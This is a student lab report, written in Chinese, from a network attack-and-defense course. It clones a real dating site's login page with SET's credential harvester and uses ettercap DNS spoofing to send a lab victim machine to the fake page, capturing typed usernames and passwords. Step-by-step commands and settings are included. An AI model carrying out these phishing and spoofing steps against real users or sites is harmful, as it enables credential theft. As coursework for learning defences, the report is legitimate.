20192406梁健 2021-2022-2 《网络与系统攻防技术》实验七实验报告
20192406梁健 2021-2022-2 《网络与系统攻防技术》实验七实验报告
1.实验内容
本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有
(1)简单应用SET工具建立冒名网站
(2)ettercap DNS spoof
(3)结合应用两种技术,用DNS spoof引导特定访问到冒名网站。
2.实验过程
2.1 简单应用SET工具建立冒名网站
- 查看http的80端口情况,在root下输入命令
netstat -alunpt | grep 80
- 查看Apache的配置文件,并修改端口80,命令
sudo vim /etc/apache2/ports.conf
-
开启Apache服务,命令
systemctl start apache2
-
开启SET工具,命令
setoolkit
- 选择1 Social-Engineering Attacks
- 选择2 Website Attack Vectors
- 选择3 Credential Harvester Attack Method
- 选择2 Site Cloner
- 输入本机IP地址
192.168.192.128
- 输入克隆网站域名
https://login.jiayuan.com/
- 在靶机win10浏览器上输入
192.168.192.128:80
可以看到克隆网页
- 在攻击机中可以看到网页的信息,然后在网页输入用户名和密码也会被劫持
2.2 ettercap DNS spoof
-
修改kali网卡为混杂模式,命令
ifconfig eth0 promisc
-
DNS缓存表进行修改:添加记录
login.jiayuan.com A 192.168.192.128
,命令vim /etc/ettercap/etter.dns
- 开启ettercap,命令
ettercap -G
-
选择网卡eht0并开始监听
-
点击右上角三个点,选择Hosts->Scan for hosts
- 点击左上角,查看存活主机
- 靶机IP地址为
192.168.192.132
,网关为192.168.192.2
,将网关的IP添加到target1,将靶机IP添加到target2
- 点击右上角三个点,选择Plugins->Manage the plugins
- 双击执行dns_spoof
- 在靶机中
ping login.jiayuan.com
,可以来源IP为攻击机,攻击机中也有信息
2.3 结合应用两种技术,用DNS spoof引导特定访问到冒名网站。
- 开启前两个任务
- 在靶机上登录
http://login.jiayuan.com
,可以看到网页,在网页上输入信息
- 可以在攻击机终端获取相应信息
3.问题及解决方案
- 问题1:连续两次使用set工具报错,无法成功
- 问题1解决方案:在每次使用set工具前,需要重新开启apache服务
4.学习感悟、思考等
本次实验完成了DNS欺骗,实验内容使我更加清晰地了解中间人攻击和网络协议欺骗的内容。这次实验提醒我要更加注意区分网络上的内容,不一定看到的就是真的,网络深不可测,攻击防不胜防,还是要从自身出发牢牢把握个人信息,遇事多质疑。